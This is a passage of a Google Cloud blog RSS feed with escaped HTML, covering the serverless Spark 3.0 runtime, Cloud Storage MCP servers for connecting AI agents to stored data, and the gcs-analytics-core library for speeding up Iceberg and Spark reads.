&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The s&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;erverless Spark 3.0 runtime version supports current and upcoming &lt;/span&gt;&lt;a href="https://spark.apache.org/releases/spark-release-4-0-0.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Apache Spark 4.x&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations, including Spark Connect, which supports a decoupled client-server architecture that enables remote connectivity from any client.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced multi-zonal support&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To protect global enterprise workloads from zonal outages or hardware stockouts, the serverless Spark 3.0 runtime introduces enhanced multi-zonal support by default. The service can now automatically allocate execution nodes across multiple zones within a single region to help ensure obtainability.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, we do not charge for cross-zonal network traffic between nodes in a region, providing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;high availability without the traditional multi-zone tax.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This is another benefit that you can realize by bringing your global Apache Spark workloads to Google Cloud.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_2SbCvxI.max-1000x1000.png"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Looking ahead&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; the above, we’re also continuing to innovate and push the boundaries of ease of use in areas such as history-based &lt;/span&gt;&lt;a href="https://medium.com/google-cloud/a-google-engineers-take-on-a-common-spark-problem-and-how-we-re-fixing-it-44b26293cce0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autotuning&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and goal based &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/managed-spark/docs/concepts/autoscaling-serverless#profiles"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autoscaling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can take advantage of these features today by specifying &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;runtime_version: 3.0&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; in your batch workloads or interactive sessions.  To run your first workload on serverless Spark, perform the following simple steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/flows/enableapi?apiid=dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;If you aren’t the project owner, ask your project admin for the serverless Managed Service for Apache Spark &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/dataproc#dataproc.serverlessEditor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Editor &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/dataproc.serverlessEditor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) role on the project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now you’re ready to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/quickstarts/spark-batch#submit_a_spark_batch_workload"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;start running your workloads&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on the Serverless 3.0 runtime version.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; For more details, visit our updated &lt;/span&gt;&lt;a href="https://cloud.google.com/dataproc-serverless/docs/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and access serverless Managed Service for Apache Spark in the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Wed, 03 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features/</guid><category>Streaming</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What’s new in serverless Managed Service for Apache Spark</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Vinay Londhe</name><title>Software Engineering Manager</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bhooshan Mogal</name><title>Senior Product Manager</title><department></department><company></company></author></item><item><title>Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers</title><link>https://cloud.google.com/blog/topics/developers-practitioners/build-ai-agents-faster-with-gcs-google-cloud-storage-mcp-server/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud Storage (GCS) is a foundational component of the modern agentic tech stack and the preferred home for unstructured data at scale. As enterprises deploy agents in production, the critical focus has shifted to turning data into context and building secure, standardized integrations to access context. This is the core of smart storage: making unstructured data inherently agent-ready by turning passive objects into rich context for reasoning. Whether it’s automating complex financial workflows or diagnosing system failures in seconds, AI success now depends on how seamlessly agents can leverage this intelligence to make smart, high-stakes decisions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we will share &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;three&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; examples of agents built by customers using GCS, and then share how you can securely and reliably connect your agents to GCS using &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/docs/getting-started/intro" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (MCP). Combined with smart storage features like auto annotations and object contexts, GCS MCP server makes the whole agent deployment process easy and simple.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Real-world agent success on Google Cloud Storage&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are seeing incredible innovation from customers leveraging MCP and Google’s agentic tech stack to solve complex business problems:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Palo Alto Networks&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; built the Strata Co-Pilot agent, a screen-aware AI assistant that guides network security administrators through complex configuration flows—either by highlighting steps or executing them directly. The agent is powered by the Gemini Live API, with GCS serving as its “historical memory” connected via the GCS MCP server.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Airwallex &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;developed an AI Assistant that understands user context, answers questions, and executes workflows on their behalf. For example, it can smartly analyze expense policy documents and generate detailed approval workflows - a task that would normally take hours to do manually. GCS and GCS metadata are used by the agent to store documents and the extracted information, respectively.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=F0Kw_eD5Y04"
      data-glue-modal-trigger="uni-modal-F0Kw_eD5Y04-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_zruL8XX.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Introducing Airwallex AI Assistant: Your concierge for effortless global finance&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-F0Kw_eD5Y04-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="F0Kw_eD5Y04"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=F0Kw_eD5Y04"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Snap's &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Job Optimization Agent analyzes Flink and Spark job specs, metadata, and historical metrics stored on GCS across thousands of jobs to find optimization opportunities, generate cost estimates, and tune configurations. Using this agent, Snap is already seeing investigation time reduced from 30 minutes to 30 seconds!&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In all these three agents, the GCS MCP server handles data operations as well as enforces standard RBAC and access policies. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Connecting agents to GCS using MCP &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MCP has rapidly emerged as the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;universal &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;standard for connecting agents to data sources, but building custom servers from scratch is often a slow, distracting process that diverts focus from innovation. This path introduces significant development overhead and risk, as it forces you to manage everything from authentication and error handling to keeping pace with GCS’s evolving capabilities. To solve this, GCS offers two powerful MCP server options — Remote and Local — allowing you to offload the foundational plumbing and focus on creating value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Remote MCP server: Fully-managed &lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Connecting your agents to the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/use-cloud-storage-mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage MCP server&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; requires zero infrastructure deployment. By simply pointing your agent configuration to the managed endpoint, you gain immediate access to your unstructured data on GCS, allowing you to scale your agentic workloads effortlessly without the burden of operational overhead. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because the Cloud Storage MCP server follows the open MCP standard, it works seamlessly with major agentic frameworks like ADK and is compatible with MCP clients. You can easily connect clients like Google Antigravity and Anthropic’s Claude by adding a Custom Connector in the settings. Simply point it to your Cloud Storage MCP endpoint, and you are ready to start building — no complex configuration files required.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/image1_9FCB2cO.gif"
        
          alt="image1"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Connecting an agent to storage requires robust security and governance. GCS MCP server is built on Google Cloud's standard identity, observability, and security frameworks:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity-first security&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Authentication is handled entirely through Identity and Access Management (IAM) rather than shared keys. This ensures agents can only access data (buckets and objects) explicitly authorized by the user.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Full observability&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: To track agent activity, every request and action taken via these MCP servers is logged in Cloud Audit Logs. This provides security teams with a record of every interaction, maintaining visibility alongside ease of access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;MCP security - content scanning&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: You can optionally configure the MCP endpoint with Google’s content security service, Google Cloud Model Armor. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;This allows you to implement security controls against common MCP attack vectors—such as direct and indirect prompt injection attacks, MCP Tool poisoning attacks, and malicious URL/SQL injections—as well as prevent the leakage of sensitive data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Storage MCP servers are perfect for most production use cases; however, as with all remote servers, you lose the capability to fully customize your MCP tools.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Local MCP Server: Self-managed for controlled customization&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;While the Remote server handles standard data access, Local MCP is the right choice when you need to build &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;custom tools&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; specific to your business logic. For example, if your agent needs to perform specialized data transformations—such as redacting PII or adding context from another internal system—whenever it reads a file from GCS, a Local MCP server allows you to define those unique capabilities&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The GCS Local MCP server is an open-source &lt;/span&gt;&lt;a href="https://github.com/googleapis/gcloud-mcp/tree/main/packages/storage-mcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; of Google-maintained tools that provides you with a reliable bridge to your data. Here are a few tips to keep in mind while designing custom tools:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Provide precise, clear descriptions to minimize incorrect invocations by the models&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Implement model-friendly error handling for models to understand their mistakes and self-correct&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The GCS Local MCP is now also a part of the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/pre-built-tools-with-mcp-toolbox"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP Toolbox for Databases&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a single open-source repository containing connectors for major data services such as GCS, BigQuery, AlloyDB, Spanner, and Cloud SQL, making it easier to monitor and manage your data ecosystem. The Toolbox offers simplified development with reduced boilerplate code, enhanced security through OAuth2 and OIDC, and end-to-end observability with OpenTelemetry integration.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you are optimizing an existing process like Snap or automating workflow creations like Airwallex, your unstructured data is one of your agent's greatest assets.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Explore the generally available &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/use-cloud-storage-mcp"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;GCS Remote MCP Server&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Check out our GCS Local MCP&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;a href="https://github.com/googleapis/gcloud-mcp/tree/main/packages/storage-mcp" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub repository&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to start building custom tools today, or use it as part of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/pre-built-tools-with-mcp-toolbox"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;MCP Toolbox for Databases&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="mailto:storage-ai@google.com"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Reach out&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to us to discuss your Agent use case with GCS data.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 17:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/developers-practitioners/build-ai-agents-faster-with-gcs-google-cloud-storage-mcp-server/</guid><category>Developers &amp; Practitioners</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Hero-image.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Hero-image.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/developers-practitioners/build-ai-agents-faster-with-gcs-google-cloud-storage-mcp-server/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Himanshu Kohli</name><title>Product Manager, Google Cloud</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Manjul Sahay</name><title>Product Manager, Google Cloud</title><department></department><company></company></author></item><item><title>Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core</title><link>https://cloud.google.com/blog/products/data-analytics/optimize-iceberg-and-spark-workloads-with-gcs-analytics-core/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Many data engineers spend significant time managing compatibility and getting best performance across multiple analytics engines. To help solve this pain point, we are excited to announce &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/gcs-analytics-core" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;gcs-analytics-core&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a new open-source Java library designed to centralize and accelerate analytics optimizations for &lt;/span&gt;&lt;a href="https://cloud.google.com/storage"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Storage (GCS)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With this, you get the flexibility to select your preferred analytics engine while achieving high performance on GCS. The gcs-analytics-core library provides optimizations across various analytics engines that you use today on GCS, like the Iceberg Spark engine and plan to expand to other analytics engines by the end of this year.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Built to be shared across major data processing frameworks like Apache Spark, this library consolidates and improves performance for analytics workloads on GCS. Available natively in the Apache Iceberg Java runtime starting from version &lt;/span&gt;&lt;a href="https://iceberg.apache.org/releases/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;1.11.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this library improves read operations for columnar formats like Parquet.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What is the gcs-analytics-core library?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gcs-analytics-core library is a centralized optimization layer that sits between your analytics engines — such as Apache Spark, Trino, and Apache Hive — and the underlying GCS Java SDK. It intercepts read calls and injects performance enhancements, providing a consistent experience without requiring framework-specific tuning.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For Apache Iceberg users, it integrates into the GCSFileIO implementation, replacing traditional sequential reads with parallelized strategies to minimize latency and maximize throughput.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Key technical optimizations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The library introduces specific optimizations designed to reduce time spent on I/O and end-to-end execution time:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Vectored I/O (threaded):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This feature improves read performance by fetching multiple data ranges in parallel within a single operation, reducing the overhead of GCS calls. Without this feature, the system needs to issue a separate call for each data range, increasing both the number of operations and open file latency for each request.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Smart Parquet prefetching:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; When reading Parquet data, analytics engines typically perform an initial read of the file’s footer, which contains the data structure and information about where specific data ranges are located. The library automatically prefetches this footer data in a single chunk (typically 50KB–100KB), avoiding the multiple network calls that often occur when engines repeatedly seek backward to fetch metadata..&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Spotlight: Apache Iceberg integration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We delivered the first major integration of this library into &lt;/span&gt;&lt;a href="https://iceberg.apache.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Apache Iceberg&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;With Iceberg 1.11.0 or later, analytics engines utilizing Iceberg’s GCSFileIO can leverage these performance enhancements. To adopt the library in your environment, verify your Iceberg catalog is configured to use the native GCS FileIO:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Spark configuration example\r\nspark.sql.catalog.my_catalog.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9f8470100&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because the core optimizations are embedded within the updated Iceberg runtime and the GCS connector architecture, you automatically benefit from Parquet footer prefetching and multi-threaded vectored reads — with no complex custom tuning required.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can follow the specific integration details in Apache Iceberg &lt;/span&gt;&lt;a href="https://github.com/apache/iceberg/issues/14326" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Issue #14326&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Catalog compatibility&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gcs-analytics-core library is compatible with all Iceberg catalogs  including the REST catalog, Hive, and other metadata management systems. By decoupling the performance optimizations from the catalog management layer, the library provides consistent read improvements without requiring adjustments to your existing infrastructure setup so you can scale across diverse data lake architectures.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;TPC-DS Performance Benchmarks using Spark&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To validate these improvements, end-to-end benchmarking was performed using an open source Apache Spark cluster with an Iceberg catalog configured to use GCSFileIO along with the gcs-analytics-core library.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The benchmark leveraged the industry-standard &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;TPC-DS&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; schema across varying dataset sizes (from 1GB up to 10TB), specifically comparing the new library's optimizations against the default GCSFileIO implementation, which uses sequential vectored reads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By alleviating the I/O bottleneck at the storage layer, compute engines spend less time waiting for network responses (scan time) and more time processing data (execution time).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are the end-to-end TPC-DS benchmark results showcasing the percentage improvement when enabling gcs-analytics-core:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/TPC-DS_benchmark_for_gcs-analytics-core_I7.max-1000x1000.jpg"
        
          alt="TPC-DS benchmark for gcs-analytics-core"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
